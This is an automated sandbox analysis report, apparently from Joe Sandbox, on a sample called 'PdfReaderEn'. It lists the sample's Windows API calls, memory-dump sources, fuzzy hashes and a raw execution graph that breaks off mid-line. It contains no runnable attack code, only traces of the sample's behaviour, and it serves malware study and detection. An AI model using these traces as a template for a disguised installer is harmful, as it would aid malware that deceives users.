                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                          • API String ID: 2266616436-4211696005
                                                                                                                                                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1599320355-0
                                                                                                                                                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                          • String ID: Version
                                                                                                                                                                                          • API String ID: 512980652-315105994
                                                                                                                                                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2883127279-0
                                                                                                                                                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                          • String ID: !N~
                                                                                                                                                                                          • API String ID: 623250636-529124213
                                                                                                                                                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                          • API String ID: 3509786178-2769509956
                                                                                                                                                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.1487568857.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487536694.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487600019.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.000000000041F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000461000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487624728.0000000000497000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000B.00000002.1487764226.00000000004F4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_PdfReaderEn.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:25%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                          Total number of Nodes:982
                                                                                                                                                                                          Total number of Limit Nodes:49
                                                                                                                                                                                          execution_graph 3133 7ff636344b3b SendMessageA 3134 7ff6363455ba 3135 7ff63634557c 3134->3135 3136 7ff6363455be 3134->3136 3137 7ff63634563d lstrcmpA 3136->3137 3138 7ff636345610 3136->3138 3139 7ff636345634 3137->3139 3141 7ff636345694 3137->3141 3140 7ff636344f2c 24 API calls 3138->3140 3140->3139 3141->3139 3142 7ff6363456e8 CreateFileA 3141->3142 3142->3139 3143 7ff63634571e 3142->3143 3143->3139 3144 7ff6363457a1 CreateFileA 3143->3144 3145 7ff636345789 CharNextA 3143->3145 3146 7ff636345772 CreateDirectoryA 3143->3146 3144->3139 3145->3143 3146->3145 3147 7ff63634397e 3148 7ff63634399a 3147->3148 3149 7ff636343992 3147->3149 3150 7ff636343a2c EndDialog 3148->3150 3153 7ff63634399f 3148->3153 3149->3148 3151 7ff6363439ce GetDesktopWindow 3149->3151 3150->3153 3155 7ff636344dc8 6 API calls 3151->3155 3156 7ff636344e9f SetWindowPos 3155->3156 3158 7ff6363486f0 7 API calls 3156->3158 3159 7ff6363439e5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3158->3159 3159->3153 3160 7ff636345f7e 3161 7ff636345f9b FindResourceA LoadResource LockResource 3160->3161 3162 7ff6363451f8 7 API calls 3160->3162 3163 7ff636345fec 3161->3163 3177 7ff6363461bf 3161->3177 3162->3161 3164 7ff636345ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 3163->3164 3165 7ff636346046 3163->3165 3164->3165 3166 7ff636345e44 33 API calls 3165->3166 3167 7ff63634604b 3166->3167 3168 7ff636346059 #20 3167->3168 3169 7ff63634604f 3167->3169 3168->3169 3170 7ff6363460c1 #22 3168->3170 3173 7ff636344f2c 24 API calls 3169->3173 3171 7ff636346143 3170->3171 3172 7ff636346105 #23 3170->3172 3174 7ff636346151 FreeResource 3171->3174 3175 7ff636346165 3171->3175 3172->3169 3172->3171 3173->3171 3174->3175 3176 7ff63634618f 3175->3176 3178 7ff636344f2c 24 API calls 3175->3178 3176->3177 3179 7ff6363461a1 SendMessageA 3176->3179 3178->3176 3179->3177 3180 7ff636348400 __getmainargs 3181 7ff63634874b RtlCaptureContext RtlLookupFunctionEntry 3182 7ff6363487d7 3181->3182 3183 7ff636348795 RtlVirtualUnwind 3181->3183 3186 7ff636348714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3182->3186 3183->3182 3187 7ff636345aca 3188 7ff636345ad0 GlobalFree 3187->3188 3189 7ff636345a9e 3187->3189 2355 7ff6363458d0 2362 7ff636343c80 2355->2362 2358 7ff636345902 WriteFile 2359 7ff636345939 2358->2359 2360 7ff6363458fa 2358->2360 2359->2360 2361 7ff636345965 SendDlgItemMessageA 2359->2361 2361->2360 2363 7ff636343c8c MsgWaitForMultipleObjects 2362->2363 2364 7ff636343d25 2363->2364 2365 7ff636343cb4 PeekMessageA 2363->2365 2364->2358 2364->2360 2365->2363 2366 7ff636343cd9 2365->2366 2366->2363 2366->2364 2367 7ff636343ce7 DispatchMessageA 2366->2367 2368 7ff636343cf8 PeekMessageA 2366->2368 2367->2368 2368->2366 3190 7ff636347b0f 3191 7ff636347b5d 3190->3191 3192 7ff636347e08 CharPrevA 3191->3192 3193 7ff636347b95 CreateFileA 3192->3193 3194 7ff636347bd0 3193->3194 3195 7ff636347bde WriteFile 3193->3195 3198 7ff6363486f0 7 API calls 3194->3198 3196 7ff636347c02 CloseHandle 3195->3196 3196->3194 3199 7ff636347c35 3198->3199 3200 7ff636343a4e 3201 7ff636343a73 3200->3201 3202 7ff636343b49 3200->3202 3201->3202 3203 7ff636343a88 3201->3203 3204 7ff636343b51 GetDesktopWindow 3201->3204 3205 7ff636343a94 3202->3205 3206 7ff636343c5a EndDialog 3202->3206 3207 7ff636343a8c 3203->3207 3208 7ff636343abb 3203->3208 3209 7ff636344dc8 14 API calls 3204->3209 3206->3205 3207->3205 3211 7ff636343a9b TerminateThread 3207->3211 3208->3205 3212 7ff636343ac5 ResetEvent 3208->3212 3210 7ff636343b6f 3209->3210 3213 7ff636343b78 GetDlgItem SendMessageA GetDlgItem SendMessageA 3210->3213 3214 7ff636343bdb SetWindowTextA CreateThread 3210->3214 3211->3206 3215 7ff636344f2c 24 API calls 3212->3215 3213->3214 3214->3205 3216 7ff636343c28 3214->3216 3217 7ff636343b03 3215->3217 3218 7ff636344f2c 24 API calls 3216->3218 3219 7ff636343b24 SetEvent 3217->3219 3220 7ff636343b0c SetEvent 3217->3220 3218->3202 3221 7ff636343c80 4 API calls 3219->3221 3220->3205 3221->3202 3222 7ff6363434ce 3223 7ff6363434dc 3222->3223 3224 7ff6363434eb CallWindowProcA 3222->3224 3223->3224 3225 7ff6363434e7 3223->3225 3224->3225 3226 7ff63634868e 3227 7ff63634869d _exit 3226->3227 3228 7ff6363486a6 3226->3228 3227->3228 3229 7ff6363486bb 3228->3229 3230 7ff6363486af _cexit 3228->3230 3230->3229 3231 7ff6363489ce 3232 7ff636348a02 3231->3232 3233 7ff6363489df 3231->3233 3233->3232 3234 7ff6363489fb ?terminate@ 3233->3234 3234->3232 3235 7ff636345820 3236 7ff636345881 ReadFile 3235->3236 3237 7ff63634584d 3235->3237 3236->3237 3238 7ff63634351e 3239 7ff63634361c 3238->3239 3240 7ff636343532 3238->3240 3241 7ff636343615 3239->3241 3242 7ff636343625 SendDlgItemMessageA 3239->3242 3243 7ff63634353f 3240->3243 3244 7ff636343571 GetDesktopWindow 3240->3244 3242->3241 3243->3241 3245 7ff636343560 EndDialog 3243->3245 3246 7ff636344dc8 14 API calls 3244->3246 3245->3241 3247 7ff636343588 6 API calls 3246->3247 3247->3241 3248 7ff636345a1e 3249 7ff636345a28 3248->3249 3250 7ff636345a7d SetFilePointer 3249->3250 3251 7ff636345a3c 3249->3251 3250->3251 3252 7ff63634845e 3253 7ff636348478 GetStartupInfoW 3252->3253 3254 7ff6363484ab 3253->3254 3255 7ff6363484bd 3254->3255 3256 7ff6363484da Sleep 3254->3256 3257 7ff6363484cd _amsg_exit 3255->3257 3260 7ff6363484e7 3255->3260 3256->3254 3257->3260 3258 7ff636348569 _initterm 3261 7ff636348586 _IsNonwritableInCurrentImage 3258->3261 3259 7ff63634854a 3260->3258 3260->3259 3260->3261 3261->3259 3262 7ff63634866f _ismbblead 3261->3262 3263 7ff6363485f4 3261->3263 3262->3261 3264 7ff636342d70 292 API calls 3263->3264 3265 7ff63634862f 3264->3265 3266 7ff636348646 3265->3266 3267 7ff63634863e exit 3265->3267 3266->3259 3268 7ff63634864f _cexit 3266->3268 3267->3266 3268->3259 3269 7ff63634831e 3272 7ff636348332 3269->3272 3271 7ff636348399 __set_app_type 3273 7ff6363483d6 3271->3273 3276 7ff636348aa8 GetModuleHandleW 3272->3276 3274 7ff6363483ec 3273->3274 3275 7ff6363483df __setusermatherr 3273->3275 3275->3274 3277 7ff636348abd 3276->3277 3277->3271 3278 7ff636348a1e SetUnhandledExceptionFilter 2369 7ff636348460 2388 7ff636348bf4 2369->2388 2373 7ff6363484ab 2374 7ff6363484bd 2373->2374 2375 7ff6363484da Sleep 2373->2375 2376 7ff6363484cd _amsg_exit 2374->2376 2379 7ff6363484e7 2374->2379 2375->2373 2376->2379 2377 7ff636348569 _initterm 2380 7ff636348586 _IsNonwritableInCurrentImage 2377->2380 2378 7ff63634854a 2379->2377 2379->2378 2379->2380 2380->2378 2381 7ff63634866f _ismbblead 2380->2381 2382 7ff6363485f4 2380->2382 2381->2380 2392 7ff636342d70 GetVersion 2382->2392 2385 7ff636348646 2385->2378 2387 7ff63634864f _cexit 2385->2387 2386 7ff63634863e exit 2386->2385 2387->2378 2389 7ff636348469 GetStartupInfoW 2388->2389 2390 7ff636348c20 6 API calls 2388->2390 2389->2373 2391 7ff636348c9f 2390->2391 2391->2389 2393 7ff636342de9 2392->2393 2394 7ff636342d97 2392->2394 2416 7ff636342edc 2393->2416 2394->2393 2395 7ff636342d9b GetModuleHandleW 2394->2395 2395->2393 2397 7ff636342db3 GetProcAddress 2395->2397 2397->2393 2399 7ff636342dce 2397->2399 2399->2393 2400 7ff636342ea5 2402 7ff636342ebd 2400->2402 2403 7ff636342eb1 CloseHandle 